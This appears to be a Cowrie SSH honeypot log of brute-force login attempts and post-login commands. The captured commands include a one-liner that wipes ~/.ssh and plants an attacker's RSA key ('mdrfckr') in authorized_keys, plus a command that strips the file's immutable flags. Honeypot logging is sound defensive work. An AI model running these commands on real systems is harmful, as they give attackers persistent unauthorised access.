{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:55:26.402891Z","src_ip":"157.20.207.165","session":"781ddd5bf48f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:55:26.589149Z","src_ip":"157.20.207.165","session":"781ddd5bf48f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:55:26.590059Z","src_ip":"157.20.207.165","session":"781ddd5bf48f"}
{"eventid":"cowrie.session.connect","src_ip":"157.20.207.165","src_port":36402,"dst_ip":"1.2.3.4","dst_port":22,"session":"c40f05904c77","protocol":"ssh","message":"New connection: 157.20.207.165:36402 (1.2.3.4:22) [session: c40f05904c77]","sensor":"my-vps","timestamp":"2025-09-09T06:55:26.772505Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:55:26.773092Z","src_ip":"157.20.207.165","session":"c40f05904c77"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:55:26.957386Z","src_ip":"157.20.207.165","session":"c40f05904c77"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:55:27.733053Z","src_ip":"157.20.207.165","session":"c40f05904c77"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:55:28.919026Z","src_ip":"157.20.207.165","session":"c40f05904c77"}
{"eventid":"cowrie.session.connect","src_ip":"157.20.207.165","src_port":36406,"dst_ip":"1.2.3.4","dst_port":22,"session":"8f97d3b9a65f","protocol":"ssh","message":"New connection: 157.20.207.165:36406 (1.2.3.4:22) [session: 8f97d3b9a65f]","sensor":"my-vps","timestamp":"2025-09-09T06:55:29.102004Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:55:29.104646Z","src_ip":"157.20.207.165","session":"8f97d3b9a65f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:55:29.287131Z","src_ip":"157.20.207.165","session":"8f97d3b9a65f"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:55:30.020949Z","src_ip":"157.20.207.165","session":"8f97d3b9a65f"}
{"eventid":"cowrie.session.closed","duration":"5.8","message":"Connection lost after 5.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:55:30.207121Z","src_ip":"157.20.207.165","session":"781ddd5bf48f"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:55:30.207989Z","src_ip":"157.20.207.165","session":"8f97d3b9a65f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43115,"dst_ip":"1.2.3.4","dst_port":22,"session":"99a650d81654","protocol":"ssh","message":"New connection: 212.227.235.229:43115 (1.2.3.4:22) [session: 99a650d81654]","sensor":"my-vps","timestamp":"2025-09-09T06:55:59.721565Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:55:59.722505Z","src_ip":"212.227.235.229","session":"99a650d81654"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:55:59.965259Z","src_ip":"212.227.235.229","session":"99a650d81654"}
{"eventid":"cowrie.login.success","username":"root","password":"123412","message":"login attempt [root/123412] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:56:00.978518Z","src_ip":"212.227.235.229","session":"99a650d81654"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:56:01.487905Z","src_ip":"212.227.235.229","session":"99a650d81654"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:56:01.488769Z","src_ip":"212.227.235.229","session":"99a650d81654"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:56:01.489818Z","src_ip":"212.227.235.229","session":"99a650d81654"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:56:01.733714Z","src_ip":"212.227.235.229","session":"99a650d81654"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:56:02.329684Z","src_ip":"212.227.235.229","session":"99a650d81654"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:56:02.330431Z","src_ip":"212.227.235.229","session":"99a650d81654"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:56:02.577521Z","src_ip":"212.227.235.229","session":"99a650d81654"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:56:02.578860Z","src_ip":"212.227.235.229","session":"99a650d81654"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43772,"dst_ip":"1.2.3.4","dst_port":22,"session":"f908067d2ceb","protocol":"ssh","message":"New connection: 212.227.235.229:43772 (1.2.3.4:22) [session: f908067d2ceb]","sensor":"my-vps","timestamp":"2025-09-09T06:56:02.819815Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:56:02.820645Z","src_ip":"212.227.235.229","session":"f908067d2ceb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:56:03.063805Z","src_ip":"212.227.235.229","session":"f908067d2ceb"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:56:04.079731Z","src_ip":"212.227.235.229","session":"f908067d2ceb"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:56:05.326294Z","src_ip":"212.227.235.229","session":"f908067d2ceb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44262,"dst_ip":"1.2.3.4","dst_port":22,"session":"3feaffe593f2","protocol":"ssh","message":"New connection: 212.227.235.229:44262 (1.2.3.4:22) [session: 3feaffe593f2]","sensor":"my-vps","timestamp":"2025-09-09T06:56:05.569555Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:56:05.570217Z","src_ip":"212.227.235.229","session":"3feaffe593f2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:56:05.814465Z","src_ip":"212.227.235.229","session":"3feaffe593f2"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:56:06.828876Z","src_ip":"212.227.235.229","session":"3feaffe593f2"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:56:07.075034Z","src_ip":"212.227.235.229","session":"3feaffe593f2"}
{"eventid":"cowrie.session.closed","duration":"7.4","message":"Connection lost after 7.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:56:07.075890Z","src_ip":"212.227.235.229","session":"99a650d81654"}
{"eventid":"cowrie.session.connect","src_ip":"118.26.39.178","src_port":43850,"dst_ip":"1.2.3.4","dst_port":22,"session":"20defb8e041d","protocol":"ssh","message":"New connection: 118.26.39.178:43850 (1.2.3.4:22) [session: 20defb8e041d]","sensor":"my-vps","timestamp":"2025-09-09T06:56:07.617377Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:56:07.618718Z","src_ip":"118.26.39.178","session":"20defb8e041d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:56:07.819747Z","src_ip":"118.26.39.178","session":"20defb8e041d"}
{"eventid":"cowrie.login.failed","username":"default","password":"changeme","message":"login attempt [default/changeme] failed","sensor":"my-vps","timestamp":"2025-09-09T06:56:08.669866Z","src_ip":"118.26.39.178","session":"20defb8e041d"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:56:09.873896Z","src_ip":"118.26.39.178","session":"20defb8e041d"}
{"eventid":"cowrie.session.connect","src_ip":"157.20.207.165","src_port":58334,"dst_ip":"1.2.3.4","dst_port":22,"session":"f9d1991808c0","protocol":"ssh","message":"New connection: 157.20.207.165:58334 (1.2.3.4:22) [session: f9d1991808c0]","sensor":"my-vps","timestamp":"2025-09-09T06:56:37.229024Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:56:37.229800Z","src_ip":"157.20.207.165","session":"f9d1991808c0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:56:37.414026Z","src_ip":"157.20.207.165","session":"f9d1991808c0"}
{"eventid":"cowrie.login.success","username":"root","password":"rockstar","message":"login attempt [root/rockstar] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:56:38.188138Z","src_ip":"157.20.207.165","session":"f9d1991808c0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:56:38.612605Z","src_ip":"157.20.207.165","session":"f9d1991808c0"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:56:38.613263Z","src_ip":"157.20.207.165","session":"f9d1991808c0"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:56:38.614019Z","src_ip":"157.20.207.165","session":"f9d1991808c0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:56:38.799453Z","src_ip":"157.20.207.165","session":"f9d1991808c0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:56:39.185080Z","src_ip":"157.20.207.165","session":"f9d1991808c0"}
